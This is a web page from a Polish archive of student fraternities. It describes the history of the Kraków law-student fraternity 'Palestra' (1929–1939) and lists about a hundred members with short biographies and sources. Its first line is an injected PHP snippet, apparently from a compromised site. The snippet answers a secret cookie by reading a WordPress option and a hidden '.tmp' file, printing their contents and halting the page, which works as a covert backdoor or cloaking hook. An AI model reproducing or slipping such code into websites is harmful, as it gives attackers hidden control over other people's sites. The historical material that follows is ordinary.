if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Palestra

Dekiel Palestry - vide Poszukiwania. Nazwa:
Korporacja Studentów Prawa Uniwersytetu Jagiellońskiego „Palestra”
Siedziba:
Kraków
Data powstania:
15 X 1929 r.
Barwy:
czarna – biała – złota
Dewiza:
„Pereat mundus, fiat iustitia.” („Sprawiedliwości musi się stać zadość, choćby świat miał zginąć.”)

Rys historyczny

Banda Włodzimierza Żychowicza.

Inicjatywa powołania korporacji zrzeszających studentów prawa, słuchaczy Wydziału Prawa i Administracji Uniwersytetu Jagiellońskiego pojawiła się w 1928 r. Wśród pomysłodawców byli między innymi Józef Sas-Wisłocki oraz Mieczysław Bielski. Stowarzyszenie powstało rok później. Za oficjalną datę założenia Palestry przyjęto dzień 15 X 1929 r.

W 1929 r. Palestra została przyjęta do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 15 V 1929 r.). Kandydowała pod opieką K! Akropolia. Prawa członka rzeczywistego Związku uzyskała na IX Zjeździe ZPKA dnia 8 XII 1930 r.

Kuratorami Korporacji z ramienia Senatu UJ byli w 1931 r. prof. Adam Heydel oraz w 1938 r. prof. Adam Vetulani.

Pieczęć Palestry, 1931 r.

Całkowita ustalona, choć niekompletna imienna liczba członków obejmuje 106 nazwisk, w tym czterech członków honorowych.

Brak wiadomości o powojennej działalności Palestry i spotkaniach jej członków.

Lista członków

Poniższa, niekompletna lista członków Palestry obejmuje ponad 100 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Karol Arzt, dr praw (?), Filister honorowy Palestry
 2. Adam Heydel, (6 listopada 1893 w Gardzienicach - 14 marca 1941 w Auschwitz), s. Zdzisława, absolwent III Gimnazjum J. Sobieskiego w Krakowie, pracownik Wydziału Ekonomicznego Instytutu Handlowego w Moskwie 1915-17, urzędnik w Centralnym Komitecie Obywatelskim i Towarzystwie Pomocy Ofiarom Wojny 1917-18, pracownik Instytutu Handlowego w Kijowie 1917-18, od 1918 pracownik UJ, doktorat UJ 1922, habilitacja 1925, prof. nadzw. 1929-34, pozbawiony katedry przez Ministra Wyznań Religijnych i Oświecenia Publicznego 1934, wykładowca Wyższej Szkoły Handlowej oraz Szkoły Nauk Politycznych 1934-37, dyrektor Instytutu Ekonomicznego PAU w Warszawie, prof. zw. i kierownik Katedry Ekonomii Politycznej UJ 1937-39, dziekan Wydziału Prawa UJ 1939, kurator i Filister honorowy Palestry, aresztowany 6 listopada 1939 przez Niemców, więzień obozu koncentracyjnego Sachsenhausen 1939-40, zwolniony 1940, ponownie aresztowany 1941, więzień obozu koncentracyjnego w Auschwitz, rozstrzelany
 3. Henryk Kraus, dr praw (?), Filister honorowy Palestry
 4. Konstanty Michalski, (12 kwietnia 1879 w Małej Dąbrówce [obecnie Katowice] - 6 sierpnia 1947 w Krakowie) uczeń szkoły średniej księży misjonarzy od św. Wincentego à Paulo w Krakowie, złożył śluby zakonne 1898 oraz przyjął święcenia kapłańskie 1903, studiował slawistykę UJ, studia kontynuował w Wyższym Instytucie Filozofii w Lowanium w Belgii, tamże doktorat 1911, prefekt w Instytucie Teologii w macierzystym zakonie, od 1914 wykładowca na Wydziale Teologii UJ, prof. zw. 1919, kilkukrotny dziekan Wydziału Teologii UJ, rektor UJ 1931/32, Filister honorowy Palestry, w czasie II wojny światowej więziony w obozach koncentracyjnych we Wrocławiu, Sachsenhausen, Sichowie, od 1933 członek rzeczywisty PAU, należał do najwybitniejszych polskich filozofów pierwszej połowy XX wieku, autor 70 publikacji naukowych dotyczących filozofii średniowiecza

Członkowie rzeczywiści

 1. Zbigniew Arzt (Arct), student i absolwent prawa UJ, założyciel Palestry, akt. 1929-36, sekretarz sem. let. 1929/30, prezes sem. zim. 1932/33, filister 1936, dr
 2. Zbigniew Asanka-Japołł, ( - 19 kwietnia 1980 w Krakowie) student prawa UJ, c. 1936, akt. 1936-39, barwiarz 1937
 3. Jerzy Balicki, student prawa UJ, c. 1937, akt. 1937-39, barwiarz 1938
 4. Wilhelm Banaś, student prawa UJ, c. 1936, akt. 1936-37, skreślony 1937
 5. Mieczysław Bartnik, c. 1934, akt. 1934-36, skreślony 1936
 6. Stefan Bażant, student prawa UJ, c. 1938, akt. 1938-39, barwiarz 1939
 7. Stanisław Berger, student prawa UJ, c. 1931, akt. 1931-38, skreślony 1938
 8. Stanisław Bernacki, student prawa UJ, c. 1930, akt. 1930-31, barwiarz 1931
 9. Mieczysław Bielski, (1909-2001) student i absolwent prawa UJ, założyciel Palestry, akt. 1929-33, pierwszy wiceprezes 1929, wiceolderman sem. zim. 1931/32, filister 1933, prezes Koła Filistrów, dr praw, adwokat
 10. Kazimierz Bogusz, c. 1931, akt. 1931
 11. Marian Bojarski, c. 1932, akt. 1932-36, barwiarz 1933, sekretarz sem. let. 1933/34 oraz sem. zim. 1934/35, prezes sem. let. 1934/35 oraz sem. zim. 1935/36, filister 1936, mgr
 12. Tadeusz Bojarski, student i absolwent prawa UJ, założyciel Palestry, akt. 1929-36, filister 1936
 13. Jan Bolina, ( - 1939-45) student prawa UJ, c. 1938, akt. 1938-39, barwiarz 1938, sekretarz sem. zim. oraz sem. let. 1938/39, zamordowany przez Gestapo
 14. Rudolf Branny, student i absolwent prawa UJ, założyciel Palestry, akt. 1929-37, filister 1937
 15. Kazimierz Bujański, student prawa UJ, c. 1938, akt. 1938-39
 16. Józef Burgiel, c. 1931, akt. 1931, skreślony
 17. Marian Buszek, student prawa UJ, c. 1936, akt. 1936-38, skreślony 1938
 18. Stanisław Chmura, c. 1938, akt. 1938-39, skreślony
 19. Stanisław Czapla, student WSH, założyciel Palestry, akt. 1929-37, filister 1937, mgr
 20. Jan Czyżowski, student prawa UJ, c. 1934, akt. 1934-39, barwiarz 1936, sekretarz sem. let. 1935/36 oraz sem. zim. 1936/37, prezes sem. let. 1936/37 oraz sem. zim. 1937/38, olderman sem. let. 1937/38 oraz sem. zim. 1938/39, prezes sem. let. 1938/39, prezes Krakowskiego Koła Międzykorporacyjnego sem. let. 1938/39
 21. Zdzisław Feluś, student i absolwent prawa UJ, c. 1929, akt. 1929-39, filister 1932, skarbnik Krakowskiego Koła Międzykorporacyjnego sem. let. 1938/39
 22. Stanisław Foryś, (1905-1992) student i absolwent prawa UJ, c. 1929, akt. 1929-32, filister 1932, prof. UJ
 23. Jan Gdowski, student i absolwent prawa UJ, założyciel Palestry, akt. 1929-33, sekretarz sem. zim. 1930/31, wiceprezes sem. let. 1930/31 oraz sem. zim. 1931/32, filister 1933
 24. Wlodzimierz Gładyszowski, (1910 - 22 października 1983 w Krakowie) student i absolwent prawa UJ, założyciel Palestry, akt. 1929-33, filister 1933, adwokat
 25. Zdzisław Grzęski, c. 1931, akt. 1931, skreślony 1931
 26. Włodzimierz Gundelach, (1910-2002) student i absolwent prawa UJ, założyciel Palestry, akt. 1929-33, prezes sem. zim. 1930/31, olderman sem. zim. 1931/32, sekretarz sem. let. 1931/32, olderman sem. let. 1931/32, olderman sem. zim. 1931/32, filister 1933, adwokat
 27. Tadeusz Habuda, student prawa UJ, c. 1933, akt. 1933-36, barwiarz 1934, olderman sem. let. 1935/36
 28. Herburt Wacław Heybowicz, c. 1932, akt. 1932, skreślony
 29. Jan Höffner, student i absolwent prawa UJ, c. 1936, akt. 1936-39, barwiarz 1937, filister 1939
 30. Adam Hubiszta, student i absolwent prawa UJ, c. 1934, akt. 1934-39, barwiarz 1936, wiceprezes sem. let. 1936/37 oraz sem. zim. 1937/38, prezes sem. let. 1937/38 oraz sem. zim. 1938/39, filister 1939
 31. Stanisław Janikowski, ( - zm. w Krakowie) student i absolwent prawa UJ, założyciel Palestry, akt. 1929-39, sędzia wojskowy, adwokat
 32. Janotka, akt. 1936, fuks skreślony 1936
 33. Władysław Jaworski, student i absolwent prawa UJ, założyciel Palestry, akt. 1929-32, prezes sem. let. 1929/30, filister 1932, dr praw
 34. Jaworski, akt. 1936, fuks skreślony 1936
 35. Andrzej Jochelson, (1911 - 27 listopada 1997 we Wrocławiu) student prawa UJ, prawd. początkowo w Palestrze, wystąpił, c. 1930 Capitolia, akt. 1930-32, sekretarz zewn. sem. zim. 1931/32, dr praw, w 1938 Grudziądzu, odznaczony papieskim medalem Pro Ecclesia et Pontifice
 36. Zbigniew Jurczyński, student prawa UJ, założyciel Palestry, akt. 1929-39, pierwszy sekretarz 1929, filister 1937, skreślony 1939
 37. Antoni Juszczyk, c. 1932, akt. 1932-36, barwiarz 1933, prezes sem. let. 1933/34 oraz sem. zim. 1934/35, filister 1936, mgr
 38. Leon Juszczyk, c. 1931, akt. 1931-38, barwiarz 1932, sekretarz sem. zim. oraz sem. let. 1932/33, filister 1938, mgr
 39. Jan Kąsek, c. 1938, akt. 1938-39
 40. Edmund Kiersztyn, student i absolwent prawa UJ, założyciel Palestry, akt. 1929-33, filister 1933
 41. Jan (Janusz) Ragen Kirchmayer, (28 listopada 1912 w Krakowie - 13 marca 1977) c. 1931, akt. 1931-36, barwiarz 1932, filister 1936, mgr
 42. Jan Kott, c. 1936, akt. 1936-38, skreślony 1938
 43. Marian Kowalski, c. 1930, akt. 1930-34, skreślony 1934
 44. Leszek Kozik, student farmacji, c. 1934, akt. 1934-36, skreślony 1936
 45. Edward Kryger, c. 1933, akt. 1933-38, barwiarz 1934, sekretarz sem. let. 1934/35 oraz sem. zim. 1935/36, filister 1938, mgr
 46. Julian Krzywda, c. 1938, akt. 1938-39
 47. Karol Krzywonos, student prawa UJ, c. 1930, akt. 1930-32, skreślony 1932
 48. Józef Kubicki, student prawa UJ, c. 1930, akt. 1930, skreślony
 49. Kulisiewicz, akt. 1937, skreślony 1937
 50. Jan Kwapniewski, c. 1933, akt. 1933-36, barwiarz 1934, wiceprezes sem. zim. oraz sem. let. 1934/35, wiceprezes sem. zim. 1935/36, filister 1936, mgr
 51. Kazimierz Lenartowicz, student i absolwent prawa UJ, c. 1936, akt. 1936-39, barwiarz 1937, filister 1939
 52. Stanisław Lewicki, student prawa UJ, akt. 1937-39, barwiarz 1937, sekretarz sem. let. 1937/38
 53. Wojciech Łukasiewicz, c. 1934, akt. 1934-37, barwiarz 1936, filister 1937, mgr
 54. Adam Majchrzycki, student prawa UJ, c. 1930, akt. 1930-31, skreślony
 55. Stanisław Majka, student i absolwent prawa UJ, założyciel Palestry, akt. 1929-32, filister 1932
 56. Józef Matłaszek, student prawa UJ, c. 1931, akt. 1931-32, zwolniony 1932
 57. Piotr Mazanek, akt. 1932, zwolniony 1932
 58. Wiesław Mazur, c. 1934, akt. 1934-37, skreślony 1937
 59. Stefan Michoński (Miechoński?), student prawa UJ, c. 1934, akt. 1934-39, barwiarz 1936, sekretarz sem. let. 1936/37 oraz sem. zim. 1937/38, wiceprezes sem. let. 1937/38 oraz sem. zim. 1938/39, olderman sem. let. 1938/39
 60. Miętus, c. 1934, akt. 1934, skreślony
 61. Tadeusz Orlewicz, student i absolwent prawa UJ, akt. 1930-37, prezes sem. zim. 1933/34 (po W. Warchale), filister 1937
 62. Emil Paszek, c. 1939, akt. 1939
 63. Stanisław Maciej Patoń (Paton), student prawa UJ, barwiarz 1937, akt. 1937-38, skreślony cum infamia 1938
 64. Stefan Piller, student i absolwent prawa UJ, założyciel Palestry, akt. 1929-33, sekretarz sem. zim. 1931/32, prezes sem. let. 1931/32, filister 1933
 65. Jan Pogorzelski, c. 1938, akt. 1938-39
 66. Zygmunt Polończyk, c. 1932, akt. 1932, skreślony
 67. Zbigniew Popiel, student i absolwent prawa UJ, założyciel Palestry, akt. 1929-37, filister 1937
 68. Feliks Władysław Przybyszowski, (24 lutego 1911 w Żabnie k. Tarnowa - ) s. Wilhelma i Jadwigi z Jaśkiewiczów, absolwent Gimnazjum oo. Jezuitów w Bąkowicach k. Chyrowa 1929, student prawa UJ, założyciel Palestry, akt. 1929-30/31, wystąpił 1930/31, c. 1931 Capitolia, akt. 1931-32, skarbnik 1931 oraz sekretarz 1931/32 (od grudnia 1931) Krakowskiego Koła Międzykorporacyjnego, prawd. wystąpił z Capitolii i wrócił do Palestry, filister 1936
 69. Aleksander Patek, c. 1931, akt. 1931-37, barwiarz 1932, filister 1937, mgr
 70. Stefan Rojek, student i absolwent prawa UJ, c. 1930, akt. 1930-37, barwiarz 1932, filister 1937
 71. Stanisław Rymar, c. 1932, akt. 1932-34, skreślony 1934
 72. Władysław Siedlecki, (18 lipca 1911 - 9 października 1998) student prawa UJ, założyciel Palestry, akt. 1929-36, skarbnik sem. zim. 1931/32, wiceprezes sem. let. 1931/32, wiceprezes sem. zim. 1932/33, filister 1936, prezes sem. let. 1932/33, sekretarz Krakowskiego Koła Międzykorporacyjnego sem. zim. 1932/33, prof. UJ, UAM, UMK, specjalista z zakresu procedury cywilnej, autor wspomnień “Spojrzenie wstecz” (Kraków 1989), pochowany na cmentarzu przy ul. Rakowickiej w Krakowie
 73. Jan Stanisław Sikora, ( - 6 lutego 1984 w Krakowie) student i absolwent prawa UJ, c. 1934, akt. 1934-37, barwiarz 1936, filister 1937, notariusz
 74. Tadeusz Sikora, (?) (1906-1984)
 75. Konrad Stanoszek, student prawa UJ, c. 1931, akt. 1931, skreślony
 76. Józef Stochel, c. 1934, akt. 1934-37, barwiarz 1936, wiceprezes sem. let. 1935/36 oraz sem. zim. 1936/37, filister 1937, mgr
 77. Styka, c. 1937, akt. 1937, skreślony 1937
 78. Adam Szaflarski, student med. UJ, c. 1932, akt. 1932-39, barwiarz 1933, olderman sem. let. 1933/34 oraz sem. zim. 1934/35
 79. Stanisław Szczurek, student prawa UJ, c. 1934, akt. 1934-39, skreślony 1939
 80. Adam Szpunar, (27 kwietnia 1913 w Krakowie - 3 grudnia 2002 w Łodzi) student i absolwent 1934 UJ, c. 1931, akt. 1931-36, barwiarz 1932, sekretarz sem. zim. 1932/33, wiceprezes sem. let. 1932/33, prezes październik 1933, filister 1936, doktorat 1935, habilitacja 1945, cywilista, od 1949 prof. nadzw. UŁ, dziekan Wydziału Prawa 1950-53, rektor UŁ 1956-62, członek rzeczywisty PAU, dr honoris causa UW, laureat Nagrody Miasta Łodzi, autor kilkuset prac naukowych, pochowany w Alei Zasłużonych na Cmentarzu Komunalnym na Dołach w Łodzi
 81. Szydłowski, c. 1937 (?), akt. 1937, skreślony 1937
 82. Władysław Ścisło, c. 1939, akt. 1939
 83. Bogdan Tabiński, ( - lata 80-te ?) student i absolwent prawa UJ, założyciel Palestry, akt. 1929-36, filister 1936
 84. Tęcza, c. 1938, akt. 1938, skreślony 1938
 85. Marian Trecz, ( - 24 kwietnia 1984) c.1933, akt. 1933-36, barwiarz 1934, olderman sem. let. 1934/35 oraz sem. zim. 1935/36, zwolniony 1936, po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago
 86. Szczęsny Tyrkalski, c. 1938, akt. 1938-39
 87. Eugeniusz de Ville, c. 1937
 88. Seweryn Udziela, student i absolwent prawa UJ, założyciel Palestry, akt. 1929-32, wiceprezes sem. let. 1929/30 (?), prezes sem. let. 1930/31, filister 1932
 89. Andrzej Wachulski, student prawa UJ, c. 1938, akt. 1938-39, barwiarz 1938, filister 1939 (?)
 90. Antoni Warchał, c. 1937, akt. 1937-38, barwiarz 1938, skreślony
 91. Władysław Warchał, (1910 - 25 (23?) marca 1985 w Krakowie) student i absolwent prawa UJ, c. 1930, akt. 1930-36, barwiarz 1932, sekretarz sem. let. 1931/32, olderman sem. zim. oraz sem. let. 1932/33, prezes październik 1933 (po A. Szpunarze), filister 1936, adwokat
 92. Józef Waszkiewicz, c. 1936, akt. 1936-39, skreślony 1937, przyjęty ponownie 1939
 93. Michał Więckowski, ( 1912 w Krółówce k. Krakowa - 8 grudnia 2000 w Argentynie) student i absolwent prawa UJ, c. 1934, akt. 1934-38, barwiarz 1936, filister 1938, działacz narodowy i społeczny, członek Młodzieży Wszechpolskiej i SN, żołnierz NOW/AK
 94. Zdzisław Wintuszka, c. 1933, akt. 1933-36, barwiarz 1934, filister 1936, mgr
 95. Juliusz Wisłocki-Sas, (1911 - 3 września 1973 w Krakowie) student i absolwent prawa UJ, założyciel Palestry, akt. 1929-32, pierwszy prezes sem. zim. 1929/30, olderman sem. let. 1929/30 oraz sem. zim. 1930/31, filister 1932, dr praw, adwokat, autor kodeksu honorowego
 96. Andrzej lub Lech (?) Wójcicki, student prawa UJ, c. 1930, akt. 1930-35, filister 1935
 97. Adam Woźniakiewicz, student i absolwent prawa UJ, założyciel Palestry, akt. 1929-33, wiceprezes sem. zim. 1930/31, prezes sem. zim. 1931/32, olderman sem. let. 1931/32, skarbnik Krakowskiego Koła Międzykorporacyjnego 1931/32 (od grudnia 1931), filister 1933
 98. Jerzy Wróbel, c. 1933, akt. 1933, skreślony
 99. Zaczek, c. 1930, akt. 1933, skreślony
 100. Jerzy Zakulski, (28 czerwca 1911 w Wadowicach - 31 lipca 1947 w Warszawie) s. Ludwika i Heleny z d. Madejska, student i absolwent prawa UJ, założyciel Palestry, akt. 1929-36, sekretarz sem. let. 1930/31, wiceprezes sem. let. 1933/34 oraz sem. zim. 1934/35, filister 1936, adwokat, w czasie okupacji ps. “Rudolf”, “Czarny Mercedes”, “Borejsza” w Organizacji Polskiej i NSZ, szef komórki wywiadu WiN, aresztowany 23 października 1946 w Krakowie, skazany na śmierć 1947, wyrok wykonana przez rozstrzelanie [zob. szerzej Jan Żaryn (IPN. Komisja Ścigania Zbrodni przeciwko Narodowi Polskiemu), Indeks represjonowanych w PRL z powodów politycznych, kwestionariusz nr Wa/WSR/0003, znak akt SR 674/47]
 101. Stanisław Zaufal, student prawa UJ, c. 1937, akt. 1937-39, barwiarz 1938, wiceprezes sem. let. 1938/39

  Włodzimierz Żychowicz, 1937 r.

 102. Włodzimierz Żychowicz, (14 sierpnia 1914 w Krakowie - 18 maja 2012 w Krakowie) s. Władysława i Marii z d. Kochmańska, absolwent Gimnazjum św. Jacka w Krakowie, student i absolwent prawa UJ, c. 1933, akt. 1933-39, barwiarz 1934, prezes sem. let. 1935/36 oraz sem. zim. 1936/37, olderman sem. let. 1936/37 oraz sem. zim. 1937/38, sekretarz Krakowskiego Koła Międzykorporacyjnego sem. zim. 1935/36, prezes Krakowskiego Koła Międzykorporacyjnego 1936/37, działacz harcerstwa, Sokoła, Młodzieży Wszechpolskiej, Obozu Wielkiej Polski, prezes Koła Twórczości Narodowej UJ im. K. Rostworowskiego, członek władz Stronnictwa Narodowego w czasie okupacji i po wojnie do 1946, w wojnie obronnej 1939 ranny, w niewoli niemieckiej, z powodu ran zwolnieniony, wrócił do Krakowa, od kwietnia 1940 w konspiracji członek NOW-AK ps. “Żubr”, “Żubrowski”, “Adam”, organizował Podokręg “Limba” Komendy NOW w powiatach Wieliczka, Bochnia, Myślenice, Krzeszowice i Kalwaria, brał udział w scalaniu NOW-AK, ukończył kurs podchorążych, w czasie akcji “Burza” koordynował akcje oddziałów partyzanckich na terenie Okręgu Krakowskiego i działania 106 Dywizji Piechoty AK, dowódca na krakowskim Kazimierzu, w 1947 skazany na 10 lat więzienia, po zwolnieniu pracował w spółdzielniach mieszkaniowych, przedsiębiorstwach i zjednoczeniach budowlanych jako specjalista d/s organizacji, od 1981 działał w Polskim Związku Katolicko-Społecznym, a po 1989 w odrodzonym Sokole, radca prawny, pochowany na Cmentarzu Salwatorskim w Krakowie

Listę członków opracowano na podstawie:

1) “Palestra” Korporacja Studentów Prawa Uniw. Jagiell., (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1930-1931, Kraków 1931, 40 i n.,
2) Palestra Korporacja Studentów Prawa U.J., (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1938-1939, Kraków 1938, s. 34 i n.,
3) Zbysław Popławski, Lista członków Polskiej Korporacji Akademickiej Palestra (Kraków), (w:) Polskie Korporacje Akademickie 1997, nr 13, s. 64 i n.,
4) materiałów archiwalnych z Archiwum Korporacyjnego,
5) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Palestra.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 16 VIII 2010 r.
Ostatnia zmiana: 29 X 2013 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Palestra (Kraków), (na:) www.archiwumkorporacyjne.pl, stan 29 X 2013 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }